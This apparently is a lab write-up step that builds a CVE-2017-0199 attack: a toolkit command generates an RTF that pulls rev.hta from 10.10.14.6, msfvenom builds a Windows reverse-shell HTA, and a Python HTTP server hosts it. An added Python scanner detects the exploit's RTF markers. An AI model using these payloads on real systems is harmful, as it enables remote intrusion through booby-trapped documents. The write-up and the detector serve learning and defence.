15-Creating A Reverse shell

https://github.com/bhdresh/CVE-2017-0199

➜  exploit python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w hey.rtf -u http://10.10.14.6/rev.hta
Generating normal RTF payload.

Generated hey.rtf successfully
➜  exploit ls
CVE-2017-0199  hey.rtf

Now we need a reverse shell as rev.hta (the file the RTF points to); we'll create it with msfvenom.

➜  exploit msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f hta-psh -o rev.hta

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7363 bytes
Saved as: rev.hta

We need a Python 3 HTTP server on port 80 to serve rev.hta, since the URL embedded in the RTF uses plain http.

➜  exploit python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
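
For the detection side of the steps above, this added example (not part of the original write-up or of the toolkit) scans an RTF for the markers generally documented for CVE-2017-0199: an object flagged \objautlink\objupdate whose \objdata holds the URL Moniker CLSID and a remote URL. The function names and the sample input are constructed for illustration, and it is an assumption that the toolkit's output carries exactly these markers.

```python
import re

# URL Moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} in its on-disk byte order
URL_MONIKER = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")
OBJDATA = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
URL_UTF16 = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def scan_rtf(data: bytes) -> list:
    """Return one finding per embedded object that links out through a URL moniker."""
    findings = []
    for m in OBJDATA.finditer(data):
        hexed = re.sub(rb"\s+", b"", m.group(1))
        blob = bytes.fromhex(hexed[: len(hexed) & ~1].decode("ascii"))
        if URL_MONIKER not in blob:
            continue  # ordinary embedded object, no remote link
        # Control words between the enclosing \object and \objdata describe the link.
        start = data.rfind(b"\\object", 0, m.start())
        header = data[max(start, 0):m.start()]
        urls = [u.group().decode("utf-16le") for u in URL_UTF16.finditer(blob)]
        auto = b"\\objautlink" in header and b"\\objupdate" in header
        findings.append({
            "offset": m.start(),
            "urls": urls,
            "auto_update": auto,  # link is refreshed on open, without a user click
            "hta_target": any(u.lower().split("?")[0].endswith(".hta") for u in urls),
            "severity": "high" if auto and urls else "medium",
        })
    return findings


def constructed_sample(url: str, linked: bool = True) -> bytes:
    """Inert test input: carries the markers only, not a valid OLE container."""
    blob = b"\x01\x05\x00\x00" + (URL_MONIKER if linked else b"") + url.encode("utf-16le") + b"\x00\x00"
    hexed = blob.hex()
    hexed = hexed[:20] + "\r\n" + hexed[20:]  # RTF writers wrap the hex across lines
    flags = b"\\objautlink\\objupdate" if linked else b"\\objemb"
    return (b"{\\rtf1{\\object" + flags + b"{\\*\\objclass Word.Document.8}"
            b"{\\*\\objdata " + hexed.encode() + b"}}}")


if __name__ == "__main__":
    for f in scan_rtf(constructed_sample("http://example.test/a.hta")):
        print(f)
```

Real-world documents often obfuscate the hex stream, so a production scanner should rely on a full RTF object parser such as rtfobj from oletools rather than a single regular expression.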